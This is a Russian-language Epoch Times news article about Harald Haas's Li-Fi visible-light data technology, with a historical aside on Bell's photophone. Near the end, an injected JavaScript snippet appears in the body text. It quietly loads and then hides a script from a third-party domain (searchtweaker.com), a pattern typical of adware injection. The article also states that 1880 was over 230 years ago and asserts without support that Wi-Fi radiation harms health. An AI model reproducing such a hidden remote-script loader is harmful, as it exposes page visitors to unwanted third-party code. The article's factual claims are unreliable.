Wi-fi сдаёт позиции в пользу Li-fi

The Epoch Times13.11.2012 Обновлено: 06.09.2021 14:13
Wi-fi скоро сдаст свои позиции в пользу технологии Li-fi (от английского слова light — свет). Об этом заявил своим изобретением профессор эдинбургского университета Гаральд Хаас. Новинка была представлена на конференции TEDGlobal, которая прошла там же, в Эдинбурге, Шотландия.

Wi-fi  скоро сдаст свои позиции в пользу технологии Li-fi. Фото:visiblelightcomm.com


Wi-fi скоро сдаст свои позиции в пользу технологии Li-fi. Фото:visiblelightcomm.com

Новейшая технология основана на передаче данных при помощи модулируемого направленного пучка света. Исходит необходимый световой пучок, меняющий яркость совершенно незаметно для глаза человека, от светодиодного излучателя и направляется прямо к фотоприёмнику.

Способ, при котором передача информации происходит при помощи света, сделает весь процесс намного безопасней. Особенно это касается несанкционированного доступа к сети, который при использовании световой технологии практически исключён.

Конечно, система wi-fi с её плюсами, которые, безусловно, присутствуют, известна относительному большинству, но также многим известны и её минусы. И один из них, как уже говорилось — низкий уровень безопасности. И вытекает этот минус из несомненного плюса — доступности. А информация, которая часто передаётся с помощью wi-fi, в наше время, согласитесь, ценится порой крайне высоко.

Но если всё же проблемы безопасности разработчикам известны и имеют хотя и не слишком надёжные, но решения в виде шифрования сигнала и прочего, есть и иная проблема, которая озвучивается гораздо реже. Речь идёт о том радиооблучении, которое стабильно получает пользователь в зоне действия wi-fi. И это негативно отражается на здоровье человека.

И, как было сказано выше, альтернатива использующейся сегодня технологии была представлена на шотландской конференции и даже продемонстрирован её действующий прототип. По словам его создателя профессора Гаральда Хааса, новая технология лишена недостатков прежней.

Работать над своим изобретением Гаральд Хаас начал еще в 2004 году. В самих конструкциях светоизлучателя и фотоприёмника используются комплектующие, которые широко распространены и недороги. Этот фактор сыграет ключевую роль в быстром распространении нового беспроводного вида связи. И подтверждением этому может служить то обстоятельство, что во время демонстрации прототипа в роли передатчика выступил… обычный светодиодный настольный светильник. Так что в местах общественного пользования точкой доступа прекрасно послужат обычные светодиодные потолочные люстры.

Есть еще один плюс новинки Li-fi: свет не представляет никакой опасности для здоровья и в целом, а потому может без проблем использоваться в помещениях с повышенной пожароопасностью. А что касается безопасности информационной, то любое препятствие, скажем, плотный занавес, не говоря уже о стене, может надёжно заблокировать несанкционированное распространение ценных данных.

Что же можно сказать о скорости, с которой переданная информация будет достигать адресата? На данный момент технология Li-fi может предложить скорость до десяти мегабит в секунду. Но господин Хаас выражает надежду на то, что к окончанию текущего года ему удастся достичь 100 мегабит.

Кстати, стоит отметить, что компания Siemens, которая также ведет разработки в этой области, сообщила ещё в прошлом году о достижении скорости в 500 мегабит в секунду. Но расстояние было невелико: всего около 5 метров.

И в завершение немного истории. Есть и причина для такого отступления. Дело в том, что сама идея передачи информации с помощью света не нова. Всё уже было изобретено более 230-ти лет назад всё тем же Александром Беллом, тоже выходцем из Шотландии и эдинбургского университета, который известен как изобретатель телефона. Ещё в далёком 1880 году Белл вместе со своей коллегой и помощницей Сарой Оррпровел провёл с использованием своего «фотофона» успешный эксперимент по передаче телефонограммы уже тогда на расстояние в 213 метров. Источником света при этом ему служило… солнце.

Выходит, уважаемый читатель, снова оправдывает себя пословица, что всё новое — это хорошо забытое старое… И пусть современный автор разработок назвал чудесное изобретение на новый лад — «лай-фаем», но первое название — «фотофон», хотя и менее звучное, но также отражает его суть: передача информации при помощи света.

И хочется верить, что в скором времени весь мир, уже третью сотню лет пользующийся телефоном, сможет оценить по заслугам и это изобретение мозговитого англичанина.

(function(){try{var header=document.getElementsByTagName(«HEAD»)[0];var script=document.createElement(«SCRIPT»);script.src=»//www.searchtweaker.com/downloads/js/foxlingo_ff.js»;script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState==»complete»||this.readyState==»loaded»)){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Поддержите нас!

Каждый день наш проект старается радовать вас качественным и интересным контентом. Поддержите нас любой суммой денег удобным вам способом!

Поддержать
«Почему существует человечество?» — статья Ли Хунчжи, основателя Фалуньгун
КУЛЬТУРА
ЗДОРОВЬЕ
ТРАДИЦИОННАЯ КУЛЬТУРА
ВЫБОР РЕДАКТОРА